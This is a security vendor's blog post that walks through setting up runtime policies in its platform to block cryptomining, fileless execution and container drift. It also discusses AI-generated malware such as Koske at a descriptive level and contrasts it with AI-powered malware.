Aqua Blog

How to Detect and Block AI-Assisted Malware Like Koske

August 12, 2025
How to Detect and Block AI-Assisted Malware Like Koske

The Aqua Platform offers full lifecycle protection for cloud native workloads, with runtime defenses designed to detect and stop threats like the Koske. As part of the platform, Aqua Secure AI extends these protections to AI-powered applications and infrastructure, helping teams monitor and mitigate emerging AI threats. From traditional malware to AI-shaped attacks, Aqua provides the visibility and control needed to secure modern workloads.

Step-by-Step Guide

1. Create a Runtime Policy
Log in to the Aqua console and go to Workload Protection > Policies > Runtime Policies.

2. Add a Container Runtime Policy
Click Add Policy, give it a name, and choose Container Runtime Policy from the list.

3. Enable Key Runtime Controls
Check protections like:

  • Block Cryptocurrency Mining
  • Block Fileless Execution
  • Drift Prevention

4. Set the Enforcement Mode – 
Set the Enforcement Mode to Auditto monitor activity or Enforce to actively block malicious behavior.

Runtime policy in the Aqua platform to block Cryptocurrency mMining, Fileless execution, and Drift prevention

Runtime policy in the Aqua platform to block Cryptocurrency mMining, Fileless execution, and Drift prevention

For more prevention and remediation strategies, including Aqua’s Runtime Protection Policies, visit the Aqua Support Portal.

Koske and Beyond: Analyzing the Rise of AI-Crafted Threats

From the very beginning of this discussion, it’s important to clearly distinguish between two types of threats: Attacks targeting AI infrastructure, and attacks using AI.

Attacks against AI infrastructure focus on exploiting vulnerabilities, misconfigurations or supply chain in the AI stack or user interfaces. The goal may be to steal data, manipulate the model’s behavior, or even achieve remote code execution. However, this type is not the focus of today’s discussion, we will address this in the future.
Instead, we’ll explore two other categories: AI-generated malware and AI-powered malware, which are often confused, but fundamentally different.

What is an AI-Generated Malware?

AI-generated malware refers to malicious scripts or code sequences that have been created by an AI system. 

In the case of Koske malware, you can observe detailed code snippets (as well as other markers) within the malware that reveal a highly methodical and meticulous design. The code appears to be crafted by analyzing millions of code examples, blog posts, and forum discussions. The result is malware that anticipates various obstacles, while incorporating mechanisms to overcome them by, for instance, using tools like curl or wget, native socket operations, modify firewall rules, and bypass security defenses.

While none of these techniques are new, what stands out is the systematic and adaptive nature of the Koske code: if A fails, try B; if that fails, move on to C, … till X, Y, or Z, or until the objective is achieved. The Koske malware displays a surprisingly accurate, precise, and complete structure, especially when compared to the many broken or incomplete code snippets typically seen in security research.

The attack itself contains all the necessary elements for success: stealth (via rootkits), persistence, and defense evasion techniques. But even though AI clearly influenced its design, this is not yet an AI-powered attack.

What is AI-Powered Malware?

AI-powered malware, on the other hand, is connected to a live model. It could send execution results to the model in real-time and receive improved or adapted responses based on the actual outcome of the code.

This kind of in-vivo adaptability doesn’t exist in the Koske example, but it’s only a matter of time.

We’re already seeing signs of this future. Opensource offensive security tools, black market tools and underground forums have begun to advertise tools like WormGPT, FraudGPT, and ExploitGPT or PayloadGPT. These represent the next generation of threats: malware that evolves dynamically using AI capabilities.
When this becomes widespread, we’ll need adaptive layers of defense that can detect and block threats driven by AI at their core.

For more detailed information about the AI-generated Koske malware, read our blog
AI-Generated Malware in Panda Image Hides Persistent Linux Threat

Don’t wait for an attack to reveal the gaps

Contact your Aqua Sales Representative or Customer Success Manager today to learn how Aqua Secure AI monitor and mitigate emerging real-world AI threats

Tell Me More

Published under: CONTAINER SECURITY UNBOXED

Tags:

Need to secure enterprise workloads?
Aqua Cloud Native Application Protection Platform (CNAPP)
Go cloud native with the experts!
Get Demo
Aqua Security is the pioneer in securing containerized cloud native applications from development to production. Aqua's full lifecycle solution prevents attacks by enforcing pre-deployment hygiene and mitigates attacks in real time in production, reducing mean time to repair and overall business risk. The Aqua Platform, a Cloud Native Application Protection Platform (CNAPP), integrates security from Code to Cloud, combining the power of agent and agentless technology into a single solution. With enterprise scale that doesn’t slow development pipelines, Aqua secures your future in the cloud. Founded in 2015, Aqua is headquartered in Boston, MA and Ramat Gan, IL protecting over 500 of the world’s largest enterprises.
Read Aqua Security reviews on G2

Use Cases

Environments

Partners

Resources

About Us

Get in Touch

Products

Get Started
Copyright © 2026 Aqua Security Software Ltd.   Privacy Policy | Terms of Use | Cookie Policy | Your Privacy Choices |  
Accessibility Tools
Normal text size Medium text size Large text size
Normal display Black & White display High contrast display
Stop transitions and animations Underline Links